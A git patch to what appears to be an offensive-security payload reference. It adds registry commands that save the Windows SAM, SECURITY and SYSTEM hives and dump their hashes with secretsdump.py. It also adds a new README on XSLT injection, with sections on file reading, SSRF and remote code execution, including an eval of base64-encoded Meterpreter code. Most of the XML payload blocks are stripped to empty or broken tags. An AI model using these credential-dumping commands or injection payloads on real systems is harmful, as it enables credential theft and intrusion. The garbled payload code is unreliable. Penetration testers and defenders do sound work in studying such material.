From cf5a4b6e97cae0682faab4c38296050ebe5cabcb Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 17 Dec 2019 21:13:59 +0100 Subject: [PATCH] XSLT injection draft --- .../Active Directory Attack.md | 10 + XSLT Injection/README.md | 200 ++++++++++++++++++ 2 files changed, 210 insertions(+) create mode 100644 XSLT Injection/README.md diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index d709ed4..1b694a0 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -768,6 +768,16 @@ or with the builtin Windows RDP and mimikatz sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" ``` +You can extract the local SAM database to find the local administrator hash : + +```powershell +C:\> reg.exe save hklm\sam c:\temp\sam.save +C:\> reg.exe save hklm\security c:\temp\security.save +C:\> reg.exe save hklm\system c:\temp\system.save +$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL +``` + + ### OverPass-the-Hash (pass the key) Request a TGT with only the NT hash then you can connect to the machine using the TGT. diff --git a/XSLT Injection/README.md b/XSLT Injection/README.md new file mode 100644 index 0000000..3b28790 --- /dev/null +++ b/XSLT Injection/README.md @@ -0,0 +1,200 @@ +# XSLT Injection + +> Processing an unvalidated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code + +## Summary + +- [Tools](#tools) +- [Exploit](#exploit) + - [Determine the vendor and version](#determine-the-vendor-and-version) + - [External Entity](#external-entity) + - [Read files and SSRF using document](#read-files-and-ssrf-using-document) + - [Remote Code Execution with Embedded Script Blocks](#remote-code-execution-with-embedded-script-blocks) + - [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper) + - [Remote Code Execution with Java](#remote-code-execution-with-java) + - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net) + +## Tools + +## Exploit + +### Determine the vendor and version + +```xml + + + + + + +``` + +```xml + + + +
Version: +
Vendor: +
Vendor URL: + + +``` + +### External Entity + +```xml + +]> + + + Fruits &ext_file;: + + + + - : + + + + +``` + +### Read files and SSRF using document + +```xml + + + + + + + Fruits: + + + + - : + + + +``` + +### Remote Code Execution with Embedded Script Blocks + +```xml + + + + + + + + + --- BEGIN COMMAND OUTPUT --- + + --- END COMMAND OUTPUT --- + + +``` + +### Remote Code Execution with PHP wrapper + +Execute the function `readfile`. + +```xml + + + + + + +``` + +Execute the function `scandir`. + +```xml + + + + + +``` + +Execute a PHP meterpreter using PHP wrapper. + +```xml + + + + eval(base64_decode('Base64-encoded Meterpreter code')) + + + + +``` + +### Remote Code Execution with Java + +```xml + + + + + + + + +``` + +```xml + + + + +. + +``` + +### Remote Code Execution with Native .NET + +```xml + + + + + + + + + + + +
+ +
+
+
+``` + +## References + +* [From XSLT code execution to Meterpreter shells - 02 July 2012 - @agarri](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html) +* [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection) +* [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/) \ No newline at end of file